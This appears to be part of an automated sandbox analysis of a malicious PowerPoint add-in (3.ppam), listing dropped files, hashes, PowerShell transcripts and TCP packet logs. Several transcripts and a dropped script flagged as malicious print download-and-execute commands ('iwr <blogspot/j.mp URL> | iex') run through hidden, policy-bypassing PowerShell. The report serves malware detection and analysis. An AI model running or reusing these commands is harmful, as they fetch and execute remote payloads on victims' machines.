                                                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114122055..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 651689 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr https://p6tbbb.blogspot.com/atom.xml -useB|iex;..Process ID: 1284..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114122055..**********************..PS>start-sleep -s 20;iwr https://p6tbbb.blogspot.com/atom.xml -useB|iex;......NetwrixParam : powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr.. "htt
                                                                                                                                                                      C:\Users\user\Documents\20220114\PowerShell_transcript.651689.x22XD8Wy.20220114122042.txt
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29164
                                                                                                                                                                      Entropy (8bit):5.263990466735331
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:pubbhuKK4uEE+uXXJuRReCHHb2TTZummyu66quCCJuqqEussM:2
                                                                                                                                                                      MD5:4685A9837437214CDB04B736EFFD1F22
                                                                                                                                                                      SHA1:7DF61F65552AD4C3FD44259076DE5DE187AEF2C0
                                                                                                                                                                      SHA-256:3682D54F24A193AFDA8E8FD1366BFA5EC946ABE82E47C7468E1A3EA94854331C
                                                                                                                                                                      SHA-512:DBF4D9A4C4E98177FA70CE538506BC81197CC60CEBC6B91BF95987A8812461CB94C33AA710DE4A7AD673C839E6C13CA0A1143C73E1AD5806BE009207E3D282BB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114122044..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 651689 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr https://p26ynn.blogspot.com/atom.xml -useB|iex;..Process ID: 3660..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114122044..**********************..PS>start-sleep -s 20;iwr https://p26ynn.blogspot.com/atom.xml -useB|iex;..**********************..Windows PowerShell transcript start..Start time: 20220114123618..Username: computer\user.
                                                                                                                                                                      C:\Users\user\Pictures\notnice.ps1
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74
                                                                                                                                                                      Entropy (8bit):4.48425400180803
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:LuWXzJziJS4kVKpF8sPETktHZzvn:SEJmc47n8sSktHlv
                                                                                                                                                                      MD5:E889D82B058255AF743DA13001B2774A
                                                                                                                                                                      SHA1:82528561326EEBC08EE216D8BF7A457D0749B3C9
                                                                                                                                                                      SHA-256:0A150F4647B60F84416E88DFD6DC5E22FAA88B08551397E861B7B2CCAA9ED085
                                                                                                                                                                      SHA-512:D4A29D3245607BA17D7B7E8AFBD0A3431CA295CBA2753514E8D5DF3BDD5946F1E05911B25E634FCD108B56F66E25D2D446C2C56D9E2900C8D6F885204755ED7B
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: start-sleep 10;iwr "http://www.j.mp/asasdjiasjdiasjasdasddik" -useB|iex;..

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:Microsoft PowerPoint 2007+
                                                                                                                                                                      Entropy (8bit):7.494317115696514
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Microsoft PowerPoint Macro-enabled Open XML add-in (41504/1) 50.61%
                                                                                                                                                                      • Microsoft PowerPoint Macro-enabled Open XML add-in (32504/1) 39.64%
                                                                                                                                                                      • ZIP compressed archive (8000/1) 9.76%
                                                                                                                                                                      File name:3.ppam
                                                                                                                                                                      File size:12137
                                                                                                                                                                      MD5:df075573f3546a582d5f4c690a469d9d
                                                                                                                                                                      SHA1:60c1884b11d4eb05f687e077adadcd749b7a488d
                                                                                                                                                                      SHA256:4337ff8e652f6fe6b0a8d0a01a67c23764a3bf31eb9ae5fca8826f246d1de2ed
                                                                                                                                                                      SHA512:f30275a11537a9267f663e0a4f17f2b1051cd38b38bacacd86116fe9a5d259a01546cc4ba79fdc0882ada11867ceee6b109f2473ac4c04f24b5904b4d20bdd9f
                                                                                                                                                                      SSDEEP:192:xrXP/kMSP9xA88Yr1N9A2amFItZwzRIShswC7sO7kwwn5iwJ4:dXPtDF61NejCk0GShswCYekwy5Lq
                                                                                                                                                                      File Content Preview:PK..........!..-..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:80b6b2d6d6d2d2ce

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jan 14, 2022 12:20:22.279536963 CET4977680192.168.2.367.199.248.17
                                                                                                                                                                      Jan 14, 2022 12:20:22.298269987 CET804977667.199.248.17192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.298789978 CET4977680192.168.2.367.199.248.17
                                                                                                                                                                      Jan 14, 2022 12:20:22.301415920 CET4977680192.168.2.367.199.248.17
                                                                                                                                                                      Jan 14, 2022 12:20:22.319952011 CET804977667.199.248.17192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.405754089 CET804977667.199.248.17192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.435872078 CET4977880192.168.2.367.199.248.11
                                                                                                                                                                      Jan 14, 2022 12:20:22.454914093 CET804977867.199.248.11192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.456516027 CET4977880192.168.2.367.199.248.11
                                                                                                                                                                      Jan 14, 2022 12:20:22.456866980 CET4977880192.168.2.367.199.248.11
                                                                                                                                                                      Jan 14, 2022 12:20:22.461159945 CET4977680192.168.2.367.199.248.17
                                                                                                                                                                      Jan 14, 2022 12:20:22.475536108 CET804977867.199.248.11192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.572482109 CET804977867.199.248.11192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.603446960 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.603487015 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.603594065 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.617393017 CET4977880192.168.2.367.199.248.11
                                                                                                                                                                      Jan 14, 2022 12:20:22.630278111 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.630296946 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.679599047 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.679905891 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.687427998 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.687444925 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.687796116 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.742450953 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.750631094 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:22.793874979 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.356534004 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.356607914 CET44349780104.16.202.237192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.357872963 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:23.369731903 CET49780443192.168.2.3104.16.202.237
                                                                                                                                                                      Jan 14, 2022 12:20:23.405277967 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.405323982 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.405782938 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.405807018 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.405813932 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.839286089 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.839452028 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.842339039 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.842350960 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.842768908 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.845604897 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.885874987 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.180145025 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.226921082 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342442989 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342459917 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342494965 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342509985 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342516899 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342544079 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342562914 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342601061 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342605114 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.342638969 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344039917 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344052076 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344094992 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344120979 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344126940 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344135046 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.344187975 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481735945 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481775999 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481791019 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481826067 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481889009 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481894970 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481914043 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481960058 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481982946 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.481987953 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.482047081 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.492434025 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.492482901 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.492628098 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.492635965 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.492692947 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.671899080 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.671966076 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672056913 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672070980 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672087908 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672090054 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672130108 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672138929 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672152996 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672178984 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672204018 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672215939 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672264099 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672285080 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672291994 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672318935 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672348976 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672363997 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672426939 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672470093 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672516108 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672553062 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672560930 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672597885 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672606945 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672661066 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672683954 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672691107 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.672741890 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.685817003 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.733016014 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.733062983 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.733161926 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.733194113 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.733263969 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.733304024 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762115002 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762185097 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762274027 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762279987 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762298107 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762334108 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.762382030 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.776094913 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.776170969 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.776253939 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.776282072 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.776318073 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.810050964 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.810094118 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.810177088 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.810206890 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.810220957 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.851942062 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900578976 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900612116 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900686979 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900702953 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900772095 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900811911 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900835037 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900855064 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900902033 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900902987 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900918961 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900938034 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900991917 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.900991917 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901010990 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901016951 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901102066 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901124001 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901134014 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901139975 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.901181936 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.913949013 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.914068937 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.914148092 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.914170980 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.914217949 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.914257050 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948573112 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948700905 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948714972 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948749065 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948796988 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948832035 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948832035 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948863029 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:24.948928118 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.011910915 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.012036085 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.012101889 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.012145996 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.012168884 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.012224913 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039479017 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039540052 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039613962 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039642096 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039660931 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039661884 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039685011 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039690971 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039747953 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039762974 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039794922 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.039834976 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.055922985 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.055990934 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.056061029 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.056085110 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.056097984 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.056653976 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.086971045 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.087105036 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.087177038 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.087212086 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.087229967 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.087275028 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.177822113 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.177901030 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.178003073 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.178030014 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.178052902 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.178131104 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.178138971 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.178282022 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.191121101 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.191184998 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.191257954 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.191277981 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.191309929 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.191334009 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.224910021 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.224976063 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225030899 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225061893 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225081921 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225085974 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225111961 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225116968 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225162983 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.225199938 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316169977 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316234112 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316289902 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316297054 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316320896 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316349030 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316421986 CET44349784199.91.155.3192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.316468000 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:20:25.342160940 CET49784443192.168.2.3199.91.155.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.136472940 CET49824443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:09.136523962 CET44349824142.250.186.129192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.136614084 CET49824443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:09.417503119 CET49825443192.168.2.3142.250.186.129
                                                                                                                                                                      Jan 14, 2022 12:21:09.417568922 CET44349825142.250.186.129192.168.2.3
